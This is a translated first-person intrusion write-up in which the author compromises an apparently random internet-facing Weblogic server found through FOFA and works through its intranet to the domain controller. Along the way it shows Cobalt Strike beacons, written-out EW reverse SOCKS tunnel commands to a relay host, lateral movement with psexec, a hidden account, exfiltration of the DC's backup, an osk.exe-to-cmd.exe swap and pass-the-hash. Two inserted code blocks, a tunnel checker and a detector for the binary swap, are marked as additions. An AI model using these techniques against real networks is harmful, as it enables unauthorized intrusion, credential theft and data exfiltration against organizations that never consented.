Preface
Since I still wanted to practise intranet penetration, I used the simplest and crudest way to find a target: a batch search for Weblogic on FOFA, which turned up the target in short order.
A quick look at the machine's environment: it has outbound internet access, no antivirus (later I found there is actually a small firewall, but it does not block PowerShell), and there is an intranet behind it. So I went straight for CS's Scripted Web Delivery module, which stands up a web server serving a one-liner that downloads and executes the PowerShell payload.
Run the PowerShell one-liner just generated.
The beacon checks in on the CS side.
So let’s take a look at the system information.
From the output above, the server is Windows Server 2012 and the intranet segment is 192.168.200.x. Next, Ladon is used to scan the intranet.
There are not many machines in this segment, and the domain environment is visible. Then a multi-NIC scan and a web-service scan.
The intranet has multiple segments and a web service is running. Mimikatz only got one user and a password hash.
The hash cracked on CMD5.
Next comes the most exciting part: scanning for MS17-010!
Several machines appear to be vulnerable to MS17-010, so the plan is to open a SOCKS proxy and go at them directly with MSF. I had no relay server at hand (tip: when buying a server, go for pay-as-you-go billing), so I temporarily spun up a pay-as-you-go server and used EW to open a tunnel out.
The process is as follows. Upload the EW binary to the newly created server and run ew -s rcsocks -l 1900 -e 1200 to set up the forwarding tunnel: SOCKS requests received on port 1900 are forwarded to whatever host connects to port 1200.
Then upload EW to the target machine and run ew -s rssocks -d xxx.xxx.xxx.xxx -e 1200 (with the IP of the server just created), which starts a SOCKS5 service on the target and connects back to port 1200 of the relay server. Once it runs you can see the connection established.
After that, only the local proxy configuration remains. For Windows programs, SocksCap is generally used; configure the proxy as follows.
Since I want to use MSF from Kali in my local virtual machine, and the proxy is easier to configure on Kali, first edit /etc/proxychains.conf with vim.
Then prefix the application with proxychains to run it through the proxy; for example, to put MSF behind the proxy: proxychains msfconsole. The intranet road is always bumpy: after switching exploits, switching tools and calling in friends for help, I concluded that MS17-010 was genuinely not exploitable here. With the shortcut closed, I took another approach and started from the web.
Tried weak passwords, injection and the like without success; Google Translate couldn't even translate the site, so even if I got into the backend I probably wouldn't understand it. Time to look for another way, so I gathered more information:
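Before pointing MSF at the proxy it is worth confirming that the rcsocks/rssocks chain actually relays. The following is an added example, not the author's tooling and not part of the original post: it speaks SOCKS5 (RFC 1928) by hand to the rcsocks listener and asks it to CONNECT to an intranet host, so a failure reply tells you whether the relay, the rssocks end, or the target is the problem. The proxy address 127.0.0.1:1900 and the target 192.168.200.6:445 are assumptions standing in for the relay server and a host found by the scan; the greeting offers only the no-authentication method because EW's SOCKS service has no authentication.

```python
"""Hand-rolled SOCKS5 (RFC 1928) client to verify an EW rcsocks/rssocks tunnel."""
import socket
import struct
import sys

SOCKS_VER = 0x05
CMD_CONNECT = 0x01
ATYP_IPV4 = 0x01
ATYP_DOMAIN = 0x03
NO_AUTH = 0x00

# Reply codes from RFC 1928 section 6.
REPLY_TEXT = {
    0x00: "succeeded",
    0x01: "general SOCKS server failure",
    0x02: "connection not allowed by ruleset",
    0x03: "network unreachable",
    0x04: "host unreachable",
    0x05: "connection refused",
    0x06: "TTL expired",
    0x07: "command not supported",
    0x08: "address type not supported",
}


def build_greeting():
    """VER NMETHODS METHODS: offer only no-auth, which is all EW's SOCKS service does."""
    return bytes([SOCKS_VER, 1, NO_AUTH])


def build_connect(host, port):
    """VER CMD RSV ATYP DST.ADDR DST.PORT for a CONNECT request."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)   # dotted-quad intranet IP
    except OSError:
        name = host.encode("ascii")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name        # let the proxy resolve it
    return bytes([SOCKS_VER, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def parse_connect_reply(data):
    """Return (code, text) from a CONNECT reply; raises if it is not SOCKS5 at all."""
    if len(data) < 2 or data[0] != SOCKS_VER:
        raise ValueError("not a SOCKS5 reply: %r" % (data[:4],))
    code = data[1]
    return code, REPLY_TEXT.get(code, "unknown reply 0x%02x" % code)


def check_socks5_tunnel(proxy_host, proxy_port, target_host, target_port, timeout=5.0):
    """Connect to the rcsocks listener and ask it to reach an intranet host.

    Returns (ok, detail). ok is True only if the proxy accepted no-auth AND the
    CONNECT succeeded, i.e. rssocks on the target end really made the hop.
    """
    with socket.create_connection((proxy_host, proxy_port), timeout=timeout) as s:
        s.sendall(build_greeting())
        method = s.recv(2)
        if method != bytes([SOCKS_VER, NO_AUTH]):
            return False, "proxy rejected no-auth method: %r" % (method,)
        s.sendall(build_connect(target_host, target_port))
        # Longest possible reply is 4 + 1 + 255 + 2 bytes (domain-name BND.ADDR).
        code, text = parse_connect_reply(s.recv(262))
        return code == 0x00, text


if __name__ == "__main__":
    # Assumed addresses: relay SOCKS port 1900 (from the "ew -l 1900" step) and a
    # host from the intranet scan. Usage: python socks_check.py VPS_IP 1900 192.168.200.6 445
    defaults = ("127.0.0.1", "1900", "192.168.200.6", "445")
    ph, pp, th, tp = sys.argv[1:5] if len(sys.argv) == 5 else defaults
    ok, detail = check_socks5_tunnel(ph, int(pp), th, int(tp))
    print("tunnel %s: %s" % ("OK" if ok else "FAILED", detail))
```

A "host unreachable" or "connection refused" reply proves the relay and rssocks hop are both fine and only the final target is closed, whereas a connection failure to port 1900 itself means rcsocks is not listening; that distinction is what proxychains and MSF will not tell you.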
View and save the login credentials
View the list of shared computers, then try to access drive C of a shared computer.
The last one pinged successfully, giving IP 192.168.200.6.
Right-click the beacon to create a listener.
Then use psexec_psh to try to bring 192.168.200.6 online.
Online successfully.
Next, a round of information gathering on the new machine.
Nothing else of interest, so back to the starting point to see what other machines are in this segment.
There are four Linux machines, .22, .1, .5 and .11, so we can try a round of weak passwords.
I had a quick look at the process list too but found nothing. Although I had taken two intranet machines by this point, neither was in the domain, the weak passwords for the other Linux hosts were all wrong, and I was stuck. Then I noticed that the machine I had taken earlier was named Veeam Backup. I thought it might be a backup server with backup files on its disks, so I went through each of its folders carefully.
In drive D I found a folder called Backup that held backups of three machines. A quick search on the file extension turned up Veeam Backup & Replication, software that backs up vSphere among other things.
The plan became clear: install Veeam Backup & Replication locally, pull the full backup of the DC down to my own machine, restore it into a virtual machine, and overwrite osk.exe with cmd.exe from a PE boot disk. That pops a SYSTEM command prompt on the logon screen, from which I can add or modify an administrator account and log in. Then bring the restored machine online in CS locally, hashdump it to read the domain user hashes stored on it, and pass the hash to take the live DC directly.

To start: the backup server has no internet access, but it shares a folder with .21, the machine that does. For convenience I quietly created a hidden account on the backup server, used 7z to compress the latest DC backup into 700 MB volumes, and put them all in the shared folder. The .21 machine only has port 7001 exposed to the internet, so I located the Weblogic web root and downloaded the archives from the shared folder through the web path. The bandwidth of this network was miserable, around 200 KB/s on average with constant stalls, but after a long wait the download finished. While waiting I downloaded Veeam Backup & Replication on my own machine and was pleasantly surprised to find it supports local administrator login.
And since it is backing up a VM with a different IP, I guess it sits on vSphere. So I hooked up the proxy again.
Restoring the downloaded full backup locally is just as easy: install the software, double-click the backup file, and it opens in the software automatically.
Restore complete.
Now it's easy. Download Lao Mao Tao (老毛桃) and generate a PE toolbox ISO.
Mount the ISO in the VM and press ESC at boot to pick it as the boot device.
After booting into PE, rename a copy of cmd.exe to osk.exe and overwrite \Windows\System32\osk.exe on the original C: drive. Then opening the On-Screen Keyboard at the logon screen pops up a command prompt running as SYSTEM.
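The swap above is the classic accessibility-binary backdoor, and it is just as cheap to spot from the defender's side. The following is an added example of mine, not code from the post: it hashes cmd.exe in a System32 directory and reports any accessibility helper whose bytes are identical to it. It generalises beyond osk.exe to the other helpers Windows launches from the logon screen (sethc.exe, utilman.exe, narrator.exe, magnify.exe, displayswitch.exe, atbroker.exe); that list, and the constructed sample tree used to exercise the check, are my assumptions rather than anything the post covers. The directory is a parameter so the check can be pointed at a mounted offline disk, such as the restored VM's C: drive, as well as a live system.

```python
"""Detect accessibility binaries that have been replaced by a copy of cmd.exe."""
import hashlib
import os
import sys
import tempfile

# Helpers Windows starts from the logon screen as SYSTEM. osk.exe is the one used in
# the write-up; the others are the usual alternatives (assumed scope, not from the post).
ACCESSIBILITY_BINARIES = (
    "osk.exe", "sethc.exe", "utilman.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
)


def sha256_of(path):
    """SHA-256 of a file, streamed so large PE images do not sit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def find_replaced_accessibility_binaries(system32_dir):
    """Return the names of accessibility helpers that are byte-identical to cmd.exe.

    A genuine helper never shares a hash with cmd.exe, so any hit is a swapped
    binary of exactly the kind the PE trick plants.
    """
    cmd_path = os.path.join(system32_dir, "cmd.exe")
    if not os.path.isfile(cmd_path):
        raise FileNotFoundError("cmd.exe not found in %s" % system32_dir)
    cmd_hash = sha256_of(cmd_path)
    replaced = []
    for name in ACCESSIBILITY_BINARIES:
        candidate = os.path.join(system32_dir, name)
        if os.path.isfile(candidate) and sha256_of(candidate) == cmd_hash:
            replaced.append(name)
    return replaced


def build_sample_system32():
    """Constructed sample tree (NOT a real System32) with one swapped helper.

    The byte strings are placeholders; only their equality matters to the check.
    """
    root = tempfile.mkdtemp(prefix="fake_system32_")
    fake_cmd = b"MZ placeholder bytes standing in for cmd.exe"
    with open(os.path.join(root, "cmd.exe"), "wb") as f:
        f.write(fake_cmd)
    with open(os.path.join(root, "osk.exe"), "wb") as f:
        f.write(fake_cmd)                       # swapped, as in the write-up
    with open(os.path.join(root, "sethc.exe"), "wb") as f:
        f.write(b"MZ placeholder bytes for a genuine sethc.exe")
    return root


if __name__ == "__main__":
    # Usage: python osk_check.py [System32 dir]; defaults to the constructed sample.
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_system32()
    hits = find_replaced_accessibility_binaries(target)
    if hits:
        print("replaced by cmd.exe in %s: %s" % (target, ", ".join(hits)))
    else:
        print("no accessibility binary in %s matches cmd.exe" % target)
```

On a live host run it as administrator against C:\Windows\System32; on the restored VM mount the disk and pass the mounted path. A hash match with cmd.exe is the file-swap variant only; the registry variant (an Image File Execution Options debugger on the same helper names) needs a separate check.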
Adding a user directly ran into a problem here.
In the end I reset the password of a domain user and added it to the local Administrators group to log in. Then, when generating an exe to bring the machine online, I was finally stopped by the firewall. Here is a front view of the firewall.
I tried to turn it off, but shutting it down required a password, so in the end I went online with the original PowerShell one-liner instead.
And then the most ceremonial moment of all.
Finally, just pass the hash to bring the DC online.